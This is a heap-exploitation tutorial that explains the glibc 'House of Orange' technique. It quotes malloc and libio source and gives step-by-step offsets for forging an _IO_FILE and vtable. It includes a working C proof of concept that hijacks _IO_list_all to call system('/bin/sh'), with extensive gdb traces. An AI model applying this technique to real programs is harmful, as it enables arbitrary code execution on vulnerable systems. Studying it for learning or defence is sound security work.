Excuse the ads! We need some help to keep our site up.
List
House of Orange
- House of Orange is a technique that exploits the process of finding an error and printing an error message.
- If _int_malloc () does not find a free space in bins[], the unsorted bin checks for available chunks.
- Then check the size of the chunks stored in the Unsorted bin (bins[1]) to see if the memory is corrupted.
- If the chunk is corrupted, call malloc_printerr() to print an error message.
malloc.c
for (;; )
{
int iters = 0;
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk;
if (__builtin_expect (chunksize_nomask (victim) <= 2 * SIZE_SZ, 0)
|| __builtin_expect (chunksize_nomask (victim)
> av->system_mem, 0))
malloc_printerr (check_action, "malloc(): memory corruption",
chunk2mem (victim), av);
size = chunksize (victim);
- The format of the output from malloc_printerr () depends on the first argument (action).
- If the value of action is equal to 5, request the output of the string stored in the str variable.
- And if the first bit is set in the value, "*** Error in`% s':% s: 0x% s *** \ n "will output an error message.
- The first string is the path of the program, the second string is the error message, and the third-string is the address of the memory.
malloc.c
static void
malloc_printerr (int action, const char *str, void *ptr, mstate ar_ptr)
{
/* Avoid using this arena in future. We do not attempt to synchronize this
with anything else because we minimally want to ensure that __libc_message
gets its resources safely without stumbling on the current corruption. */
if (ar_ptr)
set_arena_corrupt (ar_ptr);
if ((action & 5) == 5)
__libc_message ((action & 2) ? (do_abort | do_backtrace) : do_message,
"%s\n", str);
else if (action & 1)
{
char buf[2 * sizeof (uintptr_t) + 1];
buf[sizeof (buf) - 1] = '\0';
char *cp = _itoa_word ((uintptr_t) ptr, &buf[sizeof (buf) - 1], 16, 0);
while (cp > buf)
*--cp = '0';
__libc_message ((action & 2) ? (do_abort | do_backtrace) : do_message,
"*** Error in `%s': %s: 0x%s ***\n",
__libc_argv[0] ? : "<unknown>", str, cp);
}
else if (action & 2)
abort ();
}
__libc_message() prints out the contents of the error message received from malloc_printerr().
- Then print backtrace, memory map and call abort() to terminate this application.
sysdeps/posix/libc_fatal.c
/* Abort with an error message. */
void
__libc_message (int do_abort, const char *fmt, ...)
{
...
if (do_abort)
{
BEFORE_ABORT (do_abort, written, fd);
/* Kill the application. */
abort ();
}
}
- abort () unlocks SIGABRT and calls fflush() to flush all streams.
- fflush() is a macro function that calls _IO_flush_all_lockp().
/stdlib/abort.c
/* Cause an abnormal program termination with core-dump. */
void
abort (void)
{
struct sigaction act;
sigset_t sigs;
/* First acquire the lock. */
__libc_lock_lock_recursive (lock);
/* Now it's for sure we are alone. But recursive calls are possible. */
/* Unlock SIGABRT. */
if (stage == 0)
{
++stage;
if (__sigemptyset (&sigs) == 0 &&
__sigaddset (&sigs, SIGABRT) == 0)
__sigprocmask (SIG_UNBLOCK, &sigs, (sigset_t *) NULL);
}
/* Flush all streams. We cannot close them now because the user
might have registered a handler for SIGABRT. */
if (stage == 1)
{
++stage;
fflush (NULL);
}
/* Send signal which possibly calls a user handler. */
if (stage == 2)
Macro function
#define fflush(s) _IO_flush_all_lockp (0)
- _IO_flush_all_lockp () stores "_IO_list_all" in "fp".
- And if "fp" is not "null", it executes the body code of the while loop.
- The function checks whether the value of "fp->_ mode" is less than or equal to 0 and whether the value of "fp->_ IO_write_ptr" is greater than the value of "fp->_ IO_write_base".
- Then check if the return value of _IO_OVERFLOW () is equal to EOF.
- If all of these conditions are true, we store "EOF" in the "result" variable.
- If the value of last_stamp is equal to the value of _IO_list_all_stamp, store the value of fp→_chain in fp and repeat the code before it.
/libio/genops.c
int
_IO_flush_all_lockp (int do_lock)
{
int result = 0;
struct _IO_FILE *fp;
int last_stamp;
#ifdef _IO_MTSAFE_IO
__libc_cleanup_region_start (do_lock, flush_cleanup, NULL);
if (do_lock)
_IO_lock_lock (list_all_lock);
#endif
last_stamp = _IO_list_all_stamp;
fp = (_IO_FILE *) _IO_list_all;
while (fp != NULL)
{
run_fp = fp;
if (do_lock)
_IO_flockfile (fp);
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
#if defined _LIBC || defined _GLIBCPP_USE_WCHAR_T
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
#endif
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
result = EOF;
if (do_lock)
_IO_funlockfile (fp);
run_fp = NULL;
if (last_stamp != _IO_list_all_stamp)
{
/* Something was added to the list. Start all over again. */
fp = (_IO_FILE *) _IO_list_all;
last_stamp = _IO_list_all_stamp;
}
else
fp = fp->_chain;
}
The important function in the House of Orange is _IO_OVERFLOW.
This function is a macro function, the first argument is fp and the second argument is a character or EOF.
The function calls JUMP1 () and passes FP and CH received from __overflow and _IO_OVERFLOW() as argument values.
/libio/libioP.h
/* The 'overflow' hook flushes the buffer. The second argument is a character, or EOF. It matches the streambuf::overflow virtual function. */ typedef int (*_IO_overflow_t) (_IO_FILE *, int); #define _IO_OVERFLOW(FP, CH) JUMP1 (__overflow, FP, CH) #define _IO_WOVERFLOW(FP, CH) WJUMP1 (__overflow, FP, CH)
JUMP1 () expresses FP received from __IO_OVERFLOW () as THIS.
Then pass the value to __IO_JUMPS_FUNC () to return a pointer to the vtable that THIS has.
- JUMP1 () calls the function stored in that pointer, and the name of the function to be called is called via FUNC.
- Since _IO_OVERFLOW () passed __overflow as the value of FUNC, it calls the __overflow function on the vtable owned by THIS.
House of Orange changes the value of _IO_list_all to call the desired function.
/libio/libioP.h
#if _IO_JUMPS_OFFSET # define _IO_JUMPS_FUNC(THIS) \ (IO_validate_vtable \ (*(struct _IO_jump_t **) ((void *) &_IO_JUMPS_FILE_plus (THIS) \ + (THIS)->_vtable_offset))) # define _IO_vtable_offset(THIS) (THIS)->_vtable_offset #else # define _IO_JUMPS_FUNC(THIS) (IO_validate_vtable (_IO_JUMPS_FILE_plus (THIS))) # define _IO_vtable_offset(THIS) 0 #endif #define _IO_WIDE_JUMPS_FUNC(THIS) _IO_WIDE_JUMPS(THIS) #define JUMP_FIELD(TYPE, NAME) TYPE NAME #define JUMP0(FUNC, THIS) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS) #define JUMP1(FUNC, THIS, X1) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1) #define JUMP2(FUNC, THIS, X1, X2) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1, X2) #define JUMP3(FUNC, THIS, X1,X2,X3) (_IO_JUMPS_FUNC(THIS)->FUNC) (THIS, X1,X2, X3) #define JUMP_INIT(NAME, VALUE) VALUE #define JUMP_INIT_DUMMY JUMP_INIT(dummy, 0), JUMP_INIT (dummy2, 0)
- What you need to know in the House of Orange is that you need to understand the structure of the _IO_list_all variable.
- _IO_list_all uses the _IO_FILE_plus structure, which contains a file variable with the _IO_FILE structure and a * vtable variable with the _IO_jump_t structure.
/libio/libioP.h
extern struct _IO_FILE_plus *_IO_list_all;
/libio/libioP.h
/* We always allocate an extra word following an _IO_FILE.
This contains a pointer to the function jump table used.
This is for compatibility with C++ streambuf; the word can
be used to smash to a pointer to a virtual function table. */
struct _IO_FILE_plus
{
_IO_FILE file;
const struct _IO_jump_t *vtable;
};
The _IO_FILE structure contains pointers and information related to file input and output.
/libio/libio.h
struct _IO_FILE {
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags
/* The following pointers correspond to the C++ streambuf protocol. */
/* Note: Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
char* _IO_read_ptr; /* Current read pointer */
char* _IO_read_end; /* End of get area. */
char* _IO_read_base; /* Start of putback+get area. */
char* _IO_write_base; /* Start of put area. */
char* _IO_write_ptr; /* Current put pointer. */
char* _IO_write_end; /* End of put area. */
char* _IO_buf_base; /* Start of reserve area. */
char* _IO_buf_end; /* End of reserve area. */
/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */
char *_IO_backup_base; /* Pointer to first valid character of backup area */
char *_IO_save_end; /* Pointer to end of non-current get area. */
struct _IO_marker *_markers;
struct _IO_FILE *_chain;
int _fileno;
#if 0
int _blksize;
#else
int _flags2;
#endif
_IO_off_t _old_offset; /* This used to be _offset but it's too small. */
#define __HAVE_COLUMN /* temporary */
/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];
/* char* _save_gptr; char* _save_egptr; */
_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
- The _IO_FILE structure is a vtable, and the function corresponding to the second argument can be called using a macro function called JUMP_FIELD ().
/libio/libioP.h
struct _IO_jump_t
{
JUMP_FIELD(size_t, __dummy);
JUMP_FIELD(size_t, __dummy2);
JUMP_FIELD(_IO_finish_t, __finish);
JUMP_FIELD(_IO_overflow_t, __overflow);
JUMP_FIELD(_IO_underflow_t, __underflow);
JUMP_FIELD(_IO_underflow_t, __uflow);
JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
/* showmany */
JUMP_FIELD(_IO_xsputn_t, __xsputn);
JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
JUMP_FIELD(_IO_seekoff_t, __seekoff);
JUMP_FIELD(_IO_seekpos_t, __seekpos);
JUMP_FIELD(_IO_setbuf_t, __setbuf);
JUMP_FIELD(_IO_sync_t, __sync);
JUMP_FIELD(_IO_doallocate_t, __doallocate);
JUMP_FIELD(_IO_read_t, __read);
JUMP_FIELD(_IO_write_t, __write);
JUMP_FIELD(_IO_seek_t, __seek);
JUMP_FIELD(_IO_close_t, __close);
JUMP_FIELD(_IO_stat_t, __stat);
JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
JUMP_FIELD(_IO_imbue_t, __imbue);
#if 0
get_column;
set_column;
#endif
};
The House of Orange must be able to overwrite the values of the top chunk's prev_size, size, and bk, and can be implemented if data can be written to the chunk.
- Requests memory allocation, overwriting the value of the top chunk's "size" with a very small value.
- The value should be appended with the PREV_INUSE flag.
- Requests to allocate more memory than Top chunk->size.
- This expands the memory area of Arena and changes the address of the top chunk.
- Since the old Top chunk is larger than the size of the fastbin, it is placed in the Unsorted bin, and the address of Arena's top is stored in fd, bk.
- To change the value of _IO_list_all, store the value of "_IO_list_all" minus 16 in bk of the chunk placed in the Unsorted bin.
- To change the value of fp-> chain, save the first argument value (up to 8 bytes) of the function to be called in "size" and 0x61 in "bk".
- To bypass the "fp-> _ mode <= 0 && fp-> _ IO_write_ptr> fp → _IO_write_base" condition, create a fake _IO_list_all (_IO_FILE, _IO_jump_t) based on the address of the chunk placed in the Unsorted bin.
- "Address of chunk placed in Unsorted bin 0xC0" becomes fp-> _ mode and stores 0 in that variable.
- "Address of chunk placed in Unsorted bin + 0x20" becomes fp→_IO_write_base and stores 2 in that variable.
- "Address of chunk placed in Unsorted bin + 0x28" becomes fp-> _ IO_write_ptr and stores 3 in that variable.
- "Address of chunks placed in unsorted bin + 0xd8" becomes Fake _IO_jump_t and stores the "address of chunks placed in unsorted bin + 0x60" in that variable.
- Store the address of the function to call in Fake _IO_jump_t + 0x18.
- Requests memory allocation that is smaller than the size of the chunks placed in the Unsorted bin.
- The allocator places the chunks in bins.
- This changes the value of _IO_list_all to the address of Arena→top.
- The value of bins [1] will be "the address of Arena → top", but the value of bins [1]-> bk will be 0, so malloc_printerr () will be called.
- Call the functions in the following order.
- malloc_printerr() → __libc_message() → abort() → _IO_flush_all_lockp()
- _IO_flush_all_lockp () stores the value stored in fp-> chain in fp because the value of _IO_list_all is the address of Arena → top.
- fp-> chain is located 0x40byte after fp and the location is bins [10].
- This causes the address of fake_IO_list_all to be stored in fp and bypasses the conditional statement to call the function stored in "Fake _IO_jump_t + 0x18".
- For example, allocate 1 memory and overwrite the top chunk's size with 0xc01.
- Requesting a memory allocation larger than this value increases the size of Arena and places the top chunks in the Unsorted bin.
- Save 0x7ffff7dd2510 (_IO_list_all (0x7ffff7dd2520)-16) to bk of chunk (0x602400) placed in the Unsorted bin.
- Save the first argument "/bin/sh" to prev_size and change the value of size to 0x61.
- Store 2 in 0x602420 (fp → _IO_write_base), and store 3 in 0x602428 (fp-> _ IO_write_ptr).
- And store 0 in 0x6024c0 (fp-> _ mode).
- Store 0x602460 in 0x6024d8(Fake _IO_jump_t) and the address of the function to call(0x4006e5) in 0x602470.
- If you request a memory allocation of size 10, the value of _IO_list_all is changed to 0x7ffff7dd1b78 and 0x602400 is stored in bins [10] and bins [11].
- _IO_flush_all_lockp () exits its if () because fp has a value of 0x7ffff7dd1b78 and fp-> _ mode has a nonzero value, and stores the fp-> chain (0x602400) value in fp.
- _IO_flush_all_lockp () calls _IO_OVERFLOW () because it satisfies the "fp-> _ mode <= 0 && fp-> _ IO_write_ptr> fp → _IO_write_base" condition.
- _IO_OVERFLOW () uses a fake vtable (0x602460) to call 0x4006e5 stored at 0x602478.
House of orange flow
Example
The code is the code described in the previous example.
Request allocation of memory of size 0x400-16.
Overwrite the top chunk's size value with 0xc01 and request an allocation of memory of size 0x1000.
The first argument of the function to be called is stored in prev_size of the Unsorted chunk, 0x61 in "size", and address of io_list_all-0x10 in "bk".
Then create a fake _IO_list_all (_IO_FILE, _IO_jump_t) behind the Unsorted chunk and request a memory allocation of size 0x10.
house_of_orange.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int winner ( char *ptr);
int main()
{
char *p1, *p2;
size_t io_list_all, *top;
p1 = malloc(0x400-16);
fprintf(stderr,"p1 : %p\n", p1);
top = (size_t *) ( (char *) p1 + 0x400 - 16);
top[1] = 0xc01;
p2 = malloc(0x1000);
fprintf(stderr,"p2 : %p\n", p2);
io_list_all = top[2] + 0x9a8;
top[3] = io_list_all - 0x10;
memcpy( ( char *) top, "/bin/sh\x00", 8);
top[1] = 0x61;
_IO_FILE *fp = (_IO_FILE *) top;
fp->_mode = 0; // top+0xc0
fp->_IO_write_base = (char *) 2; // top+0x20
fp->_IO_write_ptr = (char *) 3; // top+0x28
//struct _IO_jump_t
size_t *jump_table = &top[12]; // controlled memory
jump_table[3] = (size_t) &winner;
*(size_t *) ((size_t) fp + sizeof(_IO_FILE)) = (size_t) jump_table; // top+0xd8
malloc(10);
return 0;
}
int winner(char *ptr)
{
system(ptr);
return 0;
}
- Check the change in the value of main_arena → top → size at 0x400693 and 0x40069f, and check the change in main_arena at 0x4006ab after calling malloc ().
- How to find the address of _IO_list_all using the address of main_arena → top is checked at 0x4006dc, 0x4006e2.
- Set breakpoints at 0x400781 for analysis of __libc_message(), _ IO_flush_all_lockp().
Breakpoints
lazenca0x0@ubuntu:~/Book/Heap$ gdb -q ./house_of_orange Reading symbols from ./house_of_orange...(no debugging symbols found)...done. gdb-peda$ disassemble main Dump of assembler code for function main: 0x0000000000400656 <+0>: push rbp 0x0000000000400657 <+1>: mov rbp,rsp 0x000000000040065a <+4>: sub rsp,0x30 0x000000000040065e <+8>: mov edi,0x3f0 0x0000000000400663 <+13>: call 0x400540 <malloc@plt> 0x0000000000400668 <+18>: mov QWORD PTR [rbp-0x30],rax 0x000000000040066c <+22>: mov rax,QWORD PTR [rip+0x2009ed] # 0x601060 <stderr@@GLIBC_2.2.5> 0x0000000000400673 <+29>: mov rdx,QWORD PTR [rbp-0x30] 0x0000000000400677 <+33>: mov esi,0x400834 0x000000000040067c <+38>: mov rdi,rax 0x000000000040067f <+41>: mov eax,0x0 0x0000000000400684 <+46>: call 0x400520 <fprintf@plt> 0x0000000000400689 <+51>: mov rax,QWORD PTR [rbp-0x30] 0x000000000040068d <+55>: add rax,0x3f0 0x0000000000400693 <+61>: mov QWORD PTR [rbp-0x28],rax 0x0000000000400697 <+65>: mov rax,QWORD PTR [rbp-0x28] 0x000000000040069b <+69>: add rax,0x8 0x000000000040069f <+73>: mov QWORD PTR [rax],0xc01 0x00000000004006a6 <+80>: mov edi,0x1000 0x00000000004006ab <+85>: call 0x400540 <malloc@plt> 0x00000000004006b0 <+90>: mov QWORD PTR [rbp-0x20],rax 0x00000000004006b4 <+94>: mov rax,QWORD PTR [rip+0x2009a5] # 0x601060 <stderr@@GLIBC_2.2.5> 0x00000000004006bb <+101>: mov rdx,QWORD PTR [rbp-0x20] 0x00000000004006bf <+105>: mov esi,0x40083d 0x00000000004006c4 <+110>: mov rdi,rax 0x00000000004006c7 <+113>: mov eax,0x0 0x00000000004006cc <+118>: call 0x400520 <fprintf@plt> 0x00000000004006d1 <+123>: mov rax,QWORD PTR [rbp-0x28] 0x00000000004006d5 <+127>: add rax,0x10 0x00000000004006d9 <+131>: mov rax,QWORD PTR [rax] 0x00000000004006dc <+134>: add rax,0x9a8 0x00000000004006e2 <+140>: mov QWORD PTR [rbp-0x18],rax 0x00000000004006e6 <+144>: mov rax,QWORD PTR [rbp-0x28] 0x00000000004006ea <+148>: add rax,0x18 0x00000000004006ee <+152>: mov rdx,QWORD PTR [rbp-0x18] 0x00000000004006f2 <+156>: sub rdx,0x10 0x00000000004006f6 <+160>: mov QWORD PTR [rax],rdx 0x00000000004006f9 <+163>: mov rax,QWORD PTR [rbp-0x28] 0x00000000004006fd <+167>: mov edx,0x8 0x0000000000400702 <+172>: mov esi,0x400846 0x0000000000400707 <+177>: mov rdi,rax 0x000000000040070a <+180>: call 0x400530 <memcpy@plt> 0x000000000040070f <+185>: mov rax,QWORD PTR [rbp-0x28] 0x0000000000400713 <+189>: add rax,0x8 0x0000000000400717 <+193>: mov QWORD PTR [rax],0x61 0x000000000040071e <+200>: mov rax,QWORD PTR [rbp-0x28] 0x0000000000400722 <+204>: mov QWORD PTR [rbp-0x10],rax 0x0000000000400726 <+208>: mov rax,QWORD PTR [rbp-0x10] 0x000000000040072a <+212>: mov DWORD PTR [rax+0xc0],0x0 0x0000000000400734 <+222>: mov rax,QWORD PTR [rbp-0x10] 0x0000000000400738 <+226>: mov QWORD PTR [rax+0x20],0x2 0x0000000000400740 <+234>: mov rax,QWORD PTR [rbp-0x10] 0x0000000000400744 <+238>: mov QWORD PTR [rax+0x28],0x3 0x000000000040074c <+246>: mov rax,QWORD PTR [rbp-0x28] 0x0000000000400750 <+250>: add rax,0x60 0x0000000000400754 <+254>: mov QWORD PTR [rbp-0x8],rax 0x0000000000400758 <+258>: mov rax,QWORD PTR [rbp-0x8] 0x000000000040075c <+262>: add rax,0x18 0x0000000000400760 <+266>: mov edx,0x40078d 0x0000000000400765 <+271>: mov QWORD PTR [rax],rdx 0x0000000000400768 <+274>: mov rax,QWORD PTR [rbp-0x10] 0x000000000040076c <+278>: add rax,0xd8 0x0000000000400772 <+284>: mov rdx,rax 0x0000000000400775 <+287>: mov rax,QWORD PTR [rbp-0x8] 0x0000000000400779 <+291>: mov QWORD PTR [rdx],rax 0x000000000040077c <+294>: mov edi,0xa 0x0000000000400781 <+299>: call 0x400540 <malloc@plt> 0x0000000000400786 <+304>: mov eax,0x0 0x000000000040078b <+309>: leave 0x000000000040078c <+310>: ret End of assembler dump. gdb-peda$ b *0x0000000000400693 Breakpoint 1 at 0x400693 gdb-peda$ b *0x000000000040069f Breakpoint 2 at 0x40069f gdb-peda$ b *0x00000000004006ab Breakpoint 3 at 0x4006ab gdb-peda$ b *0x00000000004006dc Breakpoint 4 at 0x4006dc gdb-peda$ b *0x00000000004006e2 Breakpoint 5 at 0x4006e2 gdb-peda$ b *0x0000000000400781 Breakpoint 6 at 0x400781 gdb-peda$
After allocating memory, save the top chunk's address (0x602400) to the variable top (0x7fffffffe428) and overwrite the value of top → size (0x602408) with 0xc01.
top[1] = 0xc01;
gdb-peda$ r Starting program: /home/lazenca0x0/Book/Heap/house_of_orange p1 : 0x602010 Breakpoint 1, 0x0000000000400693 in main () gdb-peda$ x/4i $rip => 0x400693 <main+61>: mov QWORD PTR [rbp-0x28],rax 0x400697 <main+65>: mov rax,QWORD PTR [rbp-0x28] 0x40069b <main+69>: add rax,0x8 0x40069f <main+73>: mov QWORD PTR [rax],0xc01 gdb-peda$ i r rbp rax rbp 0x7fffffffe5d0 0x7fffffffe5d0 rax 0x602400 0x602400 gdb-peda$ p/x 0x7fffffffe5d0 - 0x28 $1 = 0x7fffffffe5a8 gdb-peda$ p main_arena.top $2 = (mchunkptr) 0x602400 gdb-peda$ c Continuing. Breakpoint 2, 0x000000000040069f in main () gdb-peda$ x/i $rip => 0x40069f <main+73>: mov QWORD PTR [rax],0xc01 gdb-peda$ i r rax rax 0x602408 0x602408 gdb-peda$ p &main_arena.top.size $3 = (size_t *) 0x602408 gdb-peda$
- When you request a memory allocation of size 0x1000, the address of the expanded memory (0x602400 → 0x624010) is stored in main_arena.top.
- Because the top chunk has changed, the value of main_arena.top.size also changes, and the previous top chunk is registered in the Unsorted bin.
- And since the size of the previous Top chunk was smaller than the requested size, we expanded the Arena's area.
- The values of main_arena.system_mem and max_system_mem have been extended from 0x21000 to 0x63000.
Change of main_arena
gdb-peda$ c Continuing. Breakpoint 3, 0x00000000004006ab in main () gdb-peda$ x/i $rip => 0x4006ab <main+85>: call 0x400540 <malloc@plt> gdb-peda$ i r rdi rdi 0x1000 0x1000 gdb-peda$ p main_arena.top $4 = (mchunkptr) 0x602400 gdb-peda$ p main_arena.top.size $5 = 0xc01 gdb-peda$ p main_arena.bins[0] $6 = (mchunkptr) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ p main_arena.bins[1] $7 = (mchunkptr) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ p main_arena.system_mem $8 = 0x21000 gdb-peda$ p main_arena.max_system_mem $9 = 0x21000 gdb-peda$ ni 0x00000000004006b0 in main () gdb-peda$ p main_arena.top $10 = (mchunkptr) 0x624010 gdb-peda$ p main_arena.top.size $11 = 0x20ff1 gdb-peda$ p main_arena.bins[0] $12 = (mchunkptr) 0x602400 gdb-peda$ p main_arena.bins[1] $13 = (mchunkptr) 0x602400 gdb-peda$ p main_arena.system_mem $14 = 0x63000 gdb-peda$ p main_arena.max_system_mem $15 = 0x63000 gdb-peda$
- The program adds 0x9a8 from the main_arena.top address to the address of * _IO_list_all, and stores the value in io_list_all.
io_list_all = top[2] + 0x9a8;
gdb-peda$ c Continuing. p2 : 0x623010 Breakpoint 4, 0x00000000004006dc in main () gdb-peda$ x/i $rip => 0x4006dc <main+134>: add rax,0x9a8 gdb-peda$ i r rax rax 0x7ffff7dd1b78 0x7ffff7dd1b78 gdb-peda$ p &main_arena.top $16 = (mchunkptr *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ x/gx 0x7ffff7dd1b78 + 0x9a8 0x7ffff7dd2520 <_IO_list_all>: 0x00007ffff7dd2540 gdb-peda$ p _IO_list_all $17 = (struct _IO_FILE_plus *) 0x7ffff7dd2540 <_IO_2_1_stderr_> gdb-peda$ c Continuing. Breakpoint 5, 0x00000000004006e2 in main () gdb-peda$ x/i $rip' Unmatched single quote. gdb-peda$ x/i $rip => 0x4006e2 <main+140>: mov QWORD PTR [rbp-0x18],rax gdb-peda$ i r rbp rax rbp 0x7fffffffe5d0 0x7fffffffe5d0 rax 0x7ffff7dd2520 0x7ffff7dd2520 gdb-peda$ p 0x7fffffffe5d0 - 0x18 $18 = 0x7fffffffe5b8 gdb-peda$ x/gx 0x7ffff7dd2520 0x7ffff7dd2520 <_IO_list_all>: 0x00007ffff7dd2540 gdb-peda$
- Save the address of _IO_list_all minus 0x10 (0x7ffff7dd2520-0x10 = 0x7ffff7dd2510) to main_arena.bins [0] .bk (0x602418).
- Store the string "/bin/sh" in main_arena.bins [0] .prev_size.
- A fake _IO_list_all (_IO_FILE, _IO_jump_t) was created at 0x602400.
- The value of fp-> _ mode is 0x0, the value of _IO_write_base is 0x2, and the value of _IO_write_ptr is 0x3.
- These values can pass the "fp-> _ mode <= 0 && fp-> _ IO_write_ptr> fp → _IO_write_base" condition.
- 0x602460 is stored in the fake vtable (0x6024d8), and the address of the winner () function is stored 0x18 away from the value.
Fake _IO_list_all & _IO_jump_t
Breakpoint 6, 0x0000000000400781 in main () gdb-peda$ x/28gx 0x602400 0x602400: 0x0068732f6e69622f 0x0000000000000061 0x602410: 0x00007ffff7dd1b78 0x00007ffff7dd2510 0x602420: 0x0000000000000002 0x0000000000000003 0x602430: 0x0000000000000000 0x0000000000000000 0x602440: 0x0000000000000000 0x0000000000000000 0x602450: 0x0000000000000000 0x0000000000000000 0x602460: 0x0000000000000000 0x0000000000000000 0x602470: 0x0000000000000000 0x000000000040078d 0x602480: 0x0000000000000000 0x0000000000000000 0x602490: 0x0000000000000000 0x0000000000000000 0x6024a0: 0x0000000000000000 0x0000000000000000 0x6024b0: 0x0000000000000000 0x0000000000000000 0x6024c0: 0x0000000000000000 0x0000000000000000 0x6024d0: 0x0000000000000000 0x0000000000602460 gdb-peda$ p main_arena.bins[0].bk $19 = (struct malloc_chunk *) 0x7ffff7dd2510 gdb-peda$ p main_arena.bins[0].prev_size $20 = 0x68732f6e69622f gdb-peda$ x/s 0x602400 0x602400: "/bin/sh" gdb-peda$ p (*(struct _IO_FILE *)0x602400)._mode $21 = 0x0 gdb-peda$ p (*(struct _IO_FILE *)0x602400)._IO_write_base $22 = 0x2 <error: Cannot access memory at address 0x2> gdb-peda$ p (*(struct _IO_FILE *)0x602400)._IO_write_ptr $23 = 0x3 <error: Cannot access memory at address 0x3> gdb-peda$ p (*(struct _IO_jump_t*)0x602460).__overflow $24 = (_IO_overflow_t) 0x40078d <winner> gdb-peda$
- Requesting a memory allocation of size 10 determines that memory corruption has occurred and calls malloc_printerr().
- Set the address of __libc_message (), _IO_flush_all_lockp () to Breakpoint for analysis.
Breakpoints - __libc_message(), _IO_flush_all_lockp()
gdb-peda$ c
Continuing.
Breakpoint 12, 0x0000000000400781 in main ()
gdb-peda$ p malloc_printerr
$25 = {void (int, const char *, void *, mstate)} 0x7ffff7a8a750 <malloc_printerr>
gdb-peda$ p __libc_message
$26 = {void (int, const char *, ...)} 0x7ffff7a84510 <__libc_message>
gdb-peda$ p _IO_flush_all_lockp
$27 = {int (int)} 0x7ffff7a89020 <_IO_flush_all_lockp>
gdb-peda$ b *0x7ffff7a8a750
Breakpoint 7 at 0x7ffff7a8a750: file malloc.c, line 4988.
gdb-peda$ b *0x7ffff7a84510
Breakpoint 8 at 0x7ffff7a84510: file ../sysdeps/posix/libc_fatal.c, line 68.
gdb-peda$ b *0x7ffff7a89020
Breakpoint 9 at 0x7ffff7a89020: file genops.c, line 760.
gdb-peda$
The program is stopped at the __libc_message () function.
Before calling the function, the code called _int_malloc() called malloc_printerr() and malloc_printerr() called __libc_message().
The code stop in __libc_message ().
gdb-peda$ c
Continuing.
Breakpoint 15, __libc_message (do_abort=0x2, fmt=fmt@entry=0x7ffff7b9ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:68
68 ../sysdeps/posix/libc_fatal.c: No such file or directory.
gdb-peda$ bt
#0 __libc_message (do_abort=0x2, fmt=fmt@entry=0x7ffff7b9ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:68
#1 0x00007ffff7a8f13e in malloc_printerr (ar_ptr=0x7ffff7dd1b20 <main_arena>, ptr=0x7ffff7dd2520 <_IO_list_all>, str=0x7ffff7b9ad3f "malloc(): memory corruption", action=<optimized out>)
at malloc.c:5006
#2 _int_malloc (av=av@entry=0x7ffff7dd1b20 <main_arena>, bytes=bytes@entry=0xa) at malloc.c:3474
#3 0x00007ffff7a91184 in __GI___libc_malloc (bytes=0xa) at malloc.c:2913
#4 0x0000000000400786 in main ()
#5 0x00007ffff7a2d830 in __libc_start_main (main=0x400656 <main>, argc=0x1, argv=0x7fffffffe538, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe528)
at ../csu/libc-start.c:291
#6 0x0000000000400589 in _start ()
gdb-peda$
- The value of _IO_list_all is now the address of main_arena.top by _int_malloc ().
- And the address of the previous Top chunk (0x602400) and the address minus 16 from _IO_list_all was placed in the Unsorted bin.
- Previous top chunks were placed in main_arena.bins [10] and main_arena.bins [11], which correspond to small bins.
The values of _IO_list_all and Arena are changed.
gdb-peda$ p _IO_list_all $30 = (struct _IO_FILE_plus *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ x/gx 0x7ffff7dd1b78 0x7ffff7dd1b78 <main_arena+88>: 0x0000000000624010 gdb-peda$ p &main_arena.top $31 = (mchunkptr *) 0x7ffff7dd1b78 <main_arena+88> gdb-peda$ p main_arena.bins[0] $32 = (mchunkptr) 0x602400 gdb-peda$ p main_arena.bins[1] $33 = (mchunkptr) 0x7ffff7dd2510 gdb-peda$ p main_arena.bins[10] $34 = (mchunkptr) 0x602400 gdb-peda$ p main_arena.bins[11] $35 = (mchunkptr) 0x602400 gdb-peda$
- When you run the code, __libc_message() prints the message received from _int_malloc, and additionally prints backtrace and memory map information.
The error message is output.
gdb-peda$ c Continuing. *** Error in `/home/lazenca0x0/house_of_orange': malloc(): memory corruption: 0x00007ffff7dd2520 *** ======= Backtrace: ========= /lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7ffff7a847e5] /lib/x86_64-linux-gnu/libc.so.6(+0x8213e)[0x7ffff7a8f13e] /lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7ffff7a91184] /home/lazenca0x0/house_of_orange[0x400786] /lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7ffff7a2d830] /home/lazenca0x0/house_of_orange[0x400589] ======= Memory map: ======== 00400000-00401000 r-xp 00000000 08:01 155963 /home/lazenca0x0/house_of_orange 00600000-00601000 r--p 00000000 08:01 155963 /home/lazenca0x0/house_of_orange 00601000-00602000 rw-p 00001000 08:01 155963 /home/lazenca0x0/house_of_orange 00602000-00645000 rw-p 00000000 00:00 0 [heap] 7ffff0000000-7ffff0021000 rw-p 00000000 00:00 0 7ffff0021000-7ffff4000000 ---p 00000000 00:00 0 